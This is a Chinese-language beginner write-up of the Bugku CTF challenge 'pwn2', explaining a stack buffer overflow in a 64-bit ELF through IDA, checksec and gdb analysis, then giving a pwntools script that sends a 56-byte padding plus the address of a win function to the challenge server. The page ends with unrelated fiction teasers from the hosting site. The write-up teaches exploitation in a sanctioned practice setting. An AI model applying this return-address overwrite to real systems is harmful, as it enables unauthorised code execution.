bugku_ctf,pwn第二题pwn2(最基础的入门级别)

写在前面: 这题可以说是非常典型的栈溢出, 非常的基础, 学会这篇文章至少对栈溢出到底在干嘛有了最基本的了解. 写了这么多总算知道为什么教栈溢出的喜欢录视频不喜欢打字了, 面对一点都不懂的小白 (比如我), 打字实在太多了

题目

给了一个pwn2文件, 和一个nc连接地址, 把pwn2文件下载下来.

分析过程

第一步: 确定这是个什么文件

直接用记事本或者notepad++把这个pwn2文件打开, 发现在开头有ELF这三个字母, 这代表一个Linux的可执行文件.
或者在Linux系统下使用file pwn2来获取文件的相关信息, 这里我们可以知道这是一个64位的程序.
64位程序的内存地址是8个字节的, 这点很重要

第二步 : 用IDA打开这个文件(暂时)

这步其实应该是查看文件的保护机制, 但是需要打开Linux虚拟机, 所以我就先用Windows的IDA看看

IDA.PNG

发现了两个关键函数get_shell_read. 再按Shift+F12看看有什么字符串
iad2.PNG

发现了关键字符cat flag, 这就是我们要的.

  • 双击cat flag这行, 看他在什么地方, 进入到下图位置
    ida3.PNG
  • 然后双击上图红框中的get_shell_, 这里其实已经可以看出,cat flag这串字符是在get_shell_函数里被调用的, 点击后会跳转到get_shell_函数的汇编代码处, 如下图:
    ida4.PNG
  • F5进行反汇编, 可以看到get_shell_的C语言代码, 非常简单, 我们只需要调用该函数将能获取到flag
    ida5.PNG
  • 查看主函数的利用位置, 直接左边那一栏双击main, 然后F5, 看到main函数的代码:
    main.PNG

    其中红线的部分的read函数就是我们需要进行溢出的点.因为memset只为s设置了0x30的存储长度, 但是read函数的读取限制为可读取0x100个字符, 这就导致存在溢出的点, 超出0x30长度的内容会覆盖到其他地址

接下来的步骤进入Linux系统进行操作, 我这里用的是kali

第三步: 查看程序运行栈, 寻找溢出地址

先把之前没做的保护机制检查做了, 这步很重要. 如果不先解除保护机制, 什么也做不了, 包括之前用ida查看也可能什么都看不出来
checksec pwn2查看文件:

checksec.PNG

可以看到这些保护机制都没有开启, 接下来调试程序看看.

gdb调试

  • 给main函数和get_shell_函数打断点,
    设置断点.PNG

    p命令查看函数的入口地址:
    函数入口地址.PNG

    主要看get_shell_的地址在0x400751
  • b read给read函数位置打上断点, 用c指令运行到断点, 查看寄存器rbprsp的值(分别对应栈帧起始地址和栈顶地址):
    reg.PNG

    **可以看到rbp-rsp的值刚好等于0x30, 也就是s的长度.

第四步:构造payload

根据上一步已经可以得出s的长度是0x30 , get_shell_函数的入口地址是0x400751, 那么按照s rbp ret的顺序, ret的偏移量应该是从s的位置加上s+rbp, 也就是0x30bytes+8bytes = 56字节,函数的入口地址也应该是8个字节0x00000000 00400751
构造payload:'a'*56 + \x51\x07\x40\x00\x00\x00\x00\x00

构造Python脚本

import pwntools
con = remote('114.116.54.89', 10003)
addr = 0x400751
payload = 'a'*56 + p64(addr)
con.recvline()
con.sendline(payload)
con.interactive()

直接运行就能得到flag了, 别忘记给虚拟机联网

基本原理

  • 栈的位置注意栈的整体是从大地址到小地址, 但是在局部, 是从小地址到大地址, 如 : 栈地址是从0x100到0x00, 局部变量s位于0x50, 他的长度是0x10, 那么s的数据存放方式是0x50 0x51 0x52 .....0x5f 0x60, 是从小到大的.
    图片.png
  • 缓冲区溢出实际上就是改变ret(返回地址)的导向, 在正常的程序中(以汇编的角度来看), 进入一个函数首先会压栈函数的输入参数然后函数的下一条地址, 然后是rbp, 然后是函数内部的局部变量
    图片.png

    这道题中s是main的局部变量, 因为main没有输入参数, 所以我们覆盖的main的返回地址在栈中的偏移量就是 s的长度+rbp地址的8个字节, 这一点我们可以通过在溢出成功后依然继续执行main剩下的部分, 输出一个"it's so boring", 来说明我们覆盖的不是read函数的返回地址, 而在main函数最后执行结束的时候才执行了get_shell_这个函数, 所以我们覆盖的是main的返回地址, 而get_shell_的返回地址是哪我们暂时是不关心的, 尽管它最后提示这个返回地址导致了错误.

更详细的栈帧内容参考https://www.52pojie.cn/thread-974510-1-1.html

练习

xctf的pwn新手区的level0这个题没记错的和这个题基本上是一样的, 除了最后是自己手动输入cat flag以外, 自己练练就知道到底学会了没.

基础需要

  • uLL: unsigned long long,无符号长整型数.
  • read(0, &s, 0x100uLL)中,第一个0表示stdin,描述符赋给stdin(描述符0),stdout(描述符1),stderr(描述符2). 该函数表示将读取到的内容按顺序从s地质处开始存储, 最多读取0x100个字符, 未正确使用该函数便会导致程序存在缓冲区溢出漏洞.
    下面这个属于基本功底, 字太多, 自己搜搜学习吧
  • 栈帧和栈的结构
  • 程序是如何执行的, 怎么使用的栈
  • gdb的基本命令
  • Python的pwntools模块的基本用法
  • 基本存储器的认识, 如rbp, rsp, rax, rdx, r8, r9等等, 了解其代表什么
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 218,386评论 6 506
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,142评论 3 394
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,704评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,702评论 1 294
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,716评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,573评论 1 305
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,314评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,230评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,680评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,873评论 3 336
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,991评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,706评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,329评论 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,910评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,038评论 1 270
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,158评论 3 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,941评论 2 355